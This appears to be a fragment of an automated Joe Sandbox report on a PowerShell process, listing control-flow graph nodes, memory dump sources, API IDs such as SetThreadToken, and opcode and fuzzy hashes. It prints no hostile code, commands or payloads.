                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$pi"i$pi"i$pi"i$pi"i$pi"i$|,$i$J[j$J[j$J[j$J[j$J[j$J[j$rZj$rZj
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3220118955

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 194 8b36831-8b36873 195 8b3687b-8b368a7 SetThreadToken 194->195 196 8b368b0-8b368cd 195->196 197 8b368a9-8b368af 195->197 197->196
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2256804399.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_8b30000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 3254676861-3452382182

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 200 8b36838-8b368a7 SetThreadToken 202 8b368b0-8b368cd 200->202 203 8b368a9-8b368af 200->203 203->202
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2256804399.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_8b30000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 3254676861-3452382182

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 248 4e9afc0-4e9afc9 call 4e9a5ac 250 4e9afce-4e9afd2 248->250 251 4e9afe2-4e9b07d 250->251 252 4e9afd4-4e9afe1 250->252 258 4e9b07f-4e9b085 251->258 259 4e9b086-4e9b0a3 251->259 258->259
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q$(&]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3105985135

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 262 4e9bae8-4e9bb78 266 4e9bb7a 262->266 267 4e9bb7e-4e9bb89 262->267 266->267 268 4e9bb8b 267->268 269 4e9bb8e-4e9bbe8 call 4e9afc0 267->269 268->269 276 4e9bc39-4e9bc3d 269->276 277 4e9bbea-4e9bbef 269->277 279 4e9bc3f-4e9bc49 276->279 280 4e9bc4e 276->280 277->276 278 4e9bbf1-4e9bc14 277->278 282 4e9bc1a-4e9bc25 278->282 279->280 281 4e9bc53-4e9bc55 280->281 283 4e9bc7a-4e9bc7d call 4e9a5a0 281->283 284 4e9bc57-4e9bc78 281->284 285 4e9bc2e-4e9bc37 282->285 286 4e9bc27-4e9bc2d 282->286 288 4e9bc82-4e9bc86 283->288 284->288 285->281 286->285 291 4e9bc88-4e9bcb1 288->291 292 4e9bcbf-4e9bcee 288->292 291->292
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 301 4e9bad8-4e9bb78 306 4e9bb7a 301->306 307 4e9bb7e-4e9bb89 301->307 306->307 308 4e9bb8b 307->308 309 4e9bb8e-4e9bbe8 call 4e9afc0 307->309 308->309 316 4e9bc39-4e9bc3d 309->316 317 4e9bbea-4e9bbef 309->317 319 4e9bc3f-4e9bc49 316->319 320 4e9bc4e 316->320 317->316 318 4e9bbf1-4e9bc14 317->318 322 4e9bc1a-4e9bc25 318->322 319->320 321 4e9bc53-4e9bc55 320->321 323 4e9bc7a-4e9bc7d call 4e9a5a0 321->323 324 4e9bc57-4e9bc78 321->324 325 4e9bc2e-4e9bc37 322->325 326 4e9bc27-4e9bc2d 322->326 328 4e9bc82-4e9bc86 323->328 324->328 325->321 326->325 331 4e9bc88-4e9bcb1 328->331 332 4e9bcbf-4e9bcee 328->332 331->332
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2fe809548fbd8fb2d9010cb7e503250763bae8888b48f98556e77e174c3d3ca7
                                                                                                                                                                                                                                                                                                                • Instruction ID: dc23bdf8a2a8830deeaa0973afd8a2ae5ccfd55e0f81db9e57fac5a092c31db6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fe809548fbd8fb2d9010cb7e503250763bae8888b48f98556e77e174c3d3ca7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2417F34A04245CFCF09CF64C494AAABFF1EF89314F1950A9D405AB392DB35DC45CB60
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4e9954dbd2e59f2bf298ac8664850a987d5647df118bb4af11418b8416d6fe98
                                                                                                                                                                                                                                                                                                                • Instruction ID: 071c138b80caa2ecba94d721a733011eaa29d1cf377bc4f0b66531f063c2cce9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e9954dbd2e59f2bf298ac8664850a987d5647df118bb4af11418b8416d6fe98
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB318D313006019FD715EB78D854A9AB7D6EFC8214F00853DD50ACB3A5DB70AC49CBA1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ac25102330007f56f707d2bc0e15b2d61edb7ed460115603be715d41f28de506
                                                                                                                                                                                                                                                                                                                • Instruction ID: 02935ea94a9d22ee7241f76d0ce1c30696aac20341ab48627f11a2185c193ad8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac25102330007f56f707d2bc0e15b2d61edb7ed460115603be715d41f28de506
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D316A70A006499FDF14DFA9D494BEEBBF2EF88314F149069E405EB390EA749C858F91
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 351bd7e61779a9a2b1113fc36de8017630b61f16c3115a304f178f355b4554a2
                                                                                                                                                                                                                                                                                                                • Instruction ID: a7ef6bde1a5d76de81e331b7c41ca08e55eecb3ba35279ff844742c099c99b5d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 351bd7e61779a9a2b1113fc36de8017630b61f16c3115a304f178f355b4554a2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57318F74A002089FEB40DFB4D454AFEBBF2EF84304F1084B9C504AB394DA35AD468FA1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: b71b589e6a912b069ff4f57823b9f1a9dae3e99ef11c2e22f1f937f71f62d08a
                                                                                                                                                                                                                                                                                                                • Instruction ID: d2d733e6cdac0c15ddef8f523c49e1dc26e6d1c32b660bef8505727c2d1d203a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b71b589e6a912b069ff4f57823b9f1a9dae3e99ef11c2e22f1f937f71f62d08a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D316B70E006098FDF54DFA9C454BAEBBF6AF88304F149039E405EB390EA349C458FA0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: acac1d3424435500f66bad27e6e27a373a3900c1685d06b6a49e8f9c3106fa89
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b57e7d36ebfd8e9a07b9686faed8b7ccf0a42ccc60fdd5a4341ca1829112678
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acac1d3424435500f66bad27e6e27a373a3900c1685d06b6a49e8f9c3106fa89
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7313A74A042048FCB14DF68E458AAEBBF1EF8D224F144469D406EB3A1DB75AD85CF91
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5258bd9a92f898789db7d93a0d2d8cca2200000f1291ae85f8f034ef2ecde6a8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7754e36470543df5da2f7399195ce42ce193b5dffdcfe4410d9d116ffb3632e3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5258bd9a92f898789db7d93a0d2d8cca2200000f1291ae85f8f034ef2ecde6a8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00218DB1A14206DFEF20CF59C644B6577F9BB45329F05C0AAE908CB261C774D984CBA3
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 81d34fdddbd46c22cdf3e225baf13375592295b9e687f04e59cf93b2b6df722b
                                                                                                                                                                                                                                                                                                                • Instruction ID: a396f3afd0716592f2d1c64655cb5b8539ad011abb100a4dcb658c8a86f108a2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d34fdddbd46c22cdf3e225baf13375592295b9e687f04e59cf93b2b6df722b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17018035700614CFCB11DB79E8086AEBBF5FB88215B10406DE50AD3242DB329915CF91
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 831c1ea678e092b8754dd3a42c05a164d1842788f5f6344abd381dd51586f09e
                                                                                                                                                                                                                                                                                                                • Instruction ID: ad0a215244dbc5517d23b14075760b4ee0a1cfa0afc15f94a8003d7baddc75ba
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 831c1ea678e092b8754dd3a42c05a164d1842788f5f6344abd381dd51586f09e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA1105382047508FC768DF39D09086ABBF6EF8931532489ADD48A8B7A1CB32E841CB50
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c132434699e670fa44899e813dc8fa6608b01c9714b5a4ea865502f24bcb1f5d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5eef84a73b93bf852502f76e2de2386056a842b161ceae9aad4368d0960bda87
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c132434699e670fa44899e813dc8fa6608b01c9714b5a4ea865502f24bcb1f5d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC01243270D3D04FDB054B6DACD05BABFE4FFA6211B0841AEE494CB2A2C664D908DB10
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: cd211d59457c8176dfae0906cd3262d24e2dc6fe58fd74ab63e41ece58a02d53
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2a720f275c6c767b82cf7b8e67afbbde53971542b923d2c7140a3e3fc77c2731
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd211d59457c8176dfae0906cd3262d24e2dc6fe58fd74ab63e41ece58a02d53
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 580126711093509AE7108E29ED84B67FFDDEF45324F18CA3AEC480B646D279E841C6F1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: b421487bb390ff89e08820376a4819d9ea73c4beaad9be7217a70c6f37c9c0f7
                                                                                                                                                                                                                                                                                                                • Instruction ID: f88bcfb336fbb9125d56d75a498d533b43e0023fd3e842f122c1176c2806ab4d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b421487bb390ff89e08820376a4819d9ea73c4beaad9be7217a70c6f37c9c0f7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11F0C8327193955FDB108E6A9C94ABBBFE9EF85221B0540BBF854C7291CA70DC408790
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 59b5de826de85bd71f093152c47555c8caca1a9bc60b73dd3f537143b4ecbd8f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 057b142b664f18b4d89eba767d410e34d723c805d3c2a875a306ea6978acb13d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59b5de826de85bd71f093152c47555c8caca1a9bc60b73dd3f537143b4ecbd8f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E01757140E3C09EE7124B259C94756BFB8EF56224F1CC5DBD9884F593C2695844C7B1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 77b4bb078b10bbff840e4ef8fef6030ace3bbf543951faa0c9549f8d52f2a797
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ce2e19334922f3fd59addc4cad187bf7e446a824d2777a26768984a19626921
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b4bb078b10bbff840e4ef8fef6030ace3bbf543951faa0c9549f8d52f2a797
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F0F4356486444BE701AB74D4143EE7FE2DFC6369F1881AAD84A9B282CE392949C7E1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c297d9f369ffcac21a47079c1098bbeb2448d91e7e84a758f8fd96468a5fabb2
                                                                                                                                                                                                                                                                                                                • Instruction ID: b0c297a9d1edb4cc77def283a6e29742fd9cbab91086414dc962f89d4ccde1dd
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c297d9f369ffcac21a47079c1098bbeb2448d91e7e84a758f8fd96468a5fabb2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0F6312093509FDB129B29A8405AFBFF5EF89374714056DE04AD7392CA759C49C7A0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 24c89272c3099f2cf6ebb728ee6ecb7f5a780a87fe0c9d502ad75e69a2e56337
                                                                                                                                                                                                                                                                                                                • Instruction ID: a93d10bfc17d3bf43f83cf661848bd5f2d0117f61797e6dedbb91259826405af
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24c89272c3099f2cf6ebb728ee6ecb7f5a780a87fe0c9d502ad75e69a2e56337
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF0BE323093641FD7108A6A9C849BBBFEDEBC9620B04417AF944C3391CAB0DC0086A0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6b500cd8ba59f3474f97418c12f3aa70616884365c9b50ed65a42904a3266e1e
